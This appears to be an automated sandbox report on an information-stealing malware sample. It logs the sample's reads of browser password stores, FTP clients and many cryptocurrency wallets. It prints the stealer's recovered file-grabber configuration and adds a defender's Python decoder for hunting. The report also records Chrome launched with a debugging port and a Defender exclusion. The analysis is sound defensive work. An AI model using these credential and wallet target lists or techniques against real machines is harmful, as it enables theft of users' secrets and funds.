            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00431442 GetUserNameA,15_2_00431442
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043156D HeapAlloc,HeapAlloc,GetTimeZoneInformation,15_2_0043156D
            Source: C:\Users\user\Desktop\Ttok18.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
            Source: Yara match | File source: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: 25aac720-4b65-4596-94df-b9a776dc62c7.exe PID: 8080, type: MEMORYSTR
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp | String found in binary or memory: er*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*,*.txt,*.png,*.pdf,*.py|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3,*.url,*.ini,*.dll|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*,*.txt,*.png,*.pdf,*.py|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3,*.ini,*.url,*.dll|
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp | String found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp | String found in binary or memory: \Electrum\wallets\
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp | String found in binary or memory: \Ethereum\
            Source: powershell.exe, 00000002.00000002.1779019343.00000000071C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: sqlcolumnencryptionkeystoreprovider
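The two configuration strings recovered from the 25aac720-...exe memory dump are pipe-delimited: the first carries file-grabber rules (the complete trailing rule is the `Flash|%DRIVE_REMOVABLE%\|...` entry; the start of the string is truncated in the report), the second lists wallet storage locations as `name|base-folder-id|relative-path|file-mask|flag` records. The following is an added example written for this page, not code from the report, from Joe Sandbox or from the sample. It decodes both strings into concrete paths to hunt for and a check of whether a given file would be swept off a removable drive. Everything about field meaning is inferred from the data and is an assumption: base-folder ids 0/1/2 are mapped to `%LOCALAPPDATA%`/`%APPDATA%`/`%USERPROFILE%` because that is where the listed wallets install, the trailing 0/1 is treated as a recursion flag, include masks are matched against the file name and exclude masks against the full path, and the two numeric fields of the grabber rule (150, 3) are kept opaque.

```python
"""Decode the pipe-delimited grabber configuration quoted in this report.

Added example for this page, not code from the report, Joe Sandbox or the
sample: it turns the wallet list and the removable-drive grabber rule into
concrete hunt paths and a 'would the grabber take this file' check.
"""
from __future__ import annotations

import fnmatch
from dataclasses import dataclass

# Wallet target list, verbatim from the memory-string dump above. The dump
# starts mid-record ("|*.*|0|"), so the parser re-aligns on the first full one.
WALLET_BLOB = r"|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|"

# Removable-drive rule, the complete tail of the other quoted string (verbatim).
GRABBER_BLOB = r"Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*,*.txt,*.png,*.pdf,*.py|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3,*.ini,*.url,*.dll|"

# Assumption: base-folder ids inferred from where the listed wallets install
# (Exodus under Roaming, Coinomi under Local, .chia under the profile root).
BASE_DIRS = {"0": "%LOCALAPPDATA%", "1": "%APPDATA%", "2": "%USERPROFILE%"}


@dataclass(frozen=True)
class WalletTarget:
    name: str
    base: str        # %LOCALAPPDATA%, %APPDATA% or %USERPROFILE%
    rel_path: str    # keeps the config's leading and trailing backslash
    mask: str        # file name or wildcard
    recursive: bool  # assumed meaning of the trailing 0/1 field


def parse_wallet_targets(blob: str) -> list[WalletTarget]:
    """Split the blob into name|base|path|mask|flag records, skipping a leading fragment."""
    tokens = blob.split("|")
    if tokens and tokens[-1] == "":
        tokens.pop()                                   # trailing separator
    start = next(i for i in range(len(tokens) - 2)     # first name|<id>|\path triple
                 if tokens[i + 1] in BASE_DIRS and tokens[i + 2].startswith("\\"))
    fields = tokens[start:]
    if len(fields) % 5:
        raise ValueError("truncated record at end of blob")
    return [WalletTarget(name, BASE_DIRS[base], path, mask, flag == "1")
            for name, base, path, mask, flag in zip(*[iter(fields)] * 5)]


def hunt_paths(targets: list[WalletTarget], env: dict[str, str] | None = None) -> list[str]:
    """Concrete paths the stealer reads; env maps %VAR% to a real folder (else kept symbolic)."""
    env = env or {}
    return sorted({env.get(t.base, t.base) + t.rel_path + t.mask for t in targets})


@dataclass(frozen=True)
class GrabberRule:
    name: str
    root: str
    include: tuple[str, ...]   # masks matched against the file name
    limits: tuple[str, str]    # two numeric fields; the report does not say what they mean
    exclude: tuple[str, ...]   # masks matched against the full path (assumption)


def parse_grabber_rule(blob: str) -> GrabberRule:
    """Parse one name|root|include-masks|n|n|exclude-masks rule."""
    name, root, inc, a, b, exc = blob.rstrip("|").split("|")
    return GrabberRule(name, root, tuple(inc.split(",")), (a, b), tuple(exc.split(",")))


def _match(text: str, pattern: str) -> bool:
    # Windows file matching is case-insensitive; fold case so Linux gives the same answer.
    return fnmatch.fnmatchcase(text.lower(), pattern.lower())


def grabber_would_take(rule: GrabberRule, path: str) -> bool:
    """True when an include mask hits the file name and no exclude mask hits the path."""
    if any(_match(path, pat) for pat in rule.exclude):
        return False
    filename = path.rsplit("\\", 1)[-1]
    return any(_match(filename, pat) for pat in rule.include)


if __name__ == "__main__":
    # Constructed profile layout for a user named "user", as in the sandbox.
    env = {"%APPDATA%": r"C:\Users\user\AppData\Roaming",
           "%LOCALAPPDATA%": r"C:\Users\user\AppData\Local",
           "%USERPROFILE%": r"C:\Users\user"}
    for p in hunt_paths(parse_wallet_targets(WALLET_BLOB), env):
        print(p)
    rule = parse_grabber_rule(GRABBER_BLOB)
    for f in (r"E:\backup\seed-phrase.txt", r"E:\tools\wallet-setup.exe"):
        print(f, "->", grabber_would_take(rule, f))
```

The resolved paths are what to check for recent reads by a non-wallet process on a suspected host; the grabber check shows that the exclude list wins over the include list, so an `.exe` named after a wallet is skipped while any `*.txt` or `*.pdf` on a removable drive is taken regardless of its name.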
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
            Source: Yara matchFile source: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 25aac720-4b65-4596-94df-b9a776dc62c7.exe PID: 8080, type: MEMORYSTR

Remote Access Functionality

Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 25aac720-4b65-4596-94df-b9a776dc62c7.exe PID: 8080, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic column, techniques listed top to bottom as they appear in the matrix; a leading number is the count badge shown beside a technique that the analysis triggered, copied as extracted):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 1 Create Account; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 1 Extra Window Memory Injection; 11 Process Injection; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 11 Disable or Modify Tools; 3 Obfuscated Files or Information; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Extra Window Memory Injection; 11 Masquerading; 41 Virtualization/Sandbox Evasion; 11 Process Injection
Credential Access: 2 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 1 Account Discovery; 4 File and Directory Discovery; 44 System Information Discovery; 211 Security Software Discovery; 41 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 4 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 2 Ingress Tool Transfer; 21 Encrypted Channel; 1 Remote Access Software; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph (the rendered graph is not preserved; node data below is recovered from the graph text, with graph node numbers in brackets and node badge numbers in parentheses as extracted)

Behavior Graph ID: 1568488; Sample: Ttok18.exe; Startdate: 04/12/2024; Architecture: WINDOWS; Score: 100

Start [2]: DNS/IP: t.me; raw.githubusercontent.com; 2 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 6 other signatures. Started: Ttok18.exe [9]; svchost.exe [14].

Ttok18.exe [9] (15 7): DNS/IP: github.com 20.233.83.145, 443, 49736 MICROSOFT-CORP-MSN-AS-BLOCKUS United States; raw.githubusercontent.com 185.199.111.133, 443, 49737 FASTLYUS Netherlands. Dropped: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, PE32; C:\Users\user\AppData\...\Ttok18.exe.log, CSV. Signatures: Adds a directory exclusion to Windows Defender. Started: 25aac720-4b65-4596-94df-b9a776dc62c7.exe [16]; powershell.exe [20]; powershell.exe [22]; 2 other processes [24].

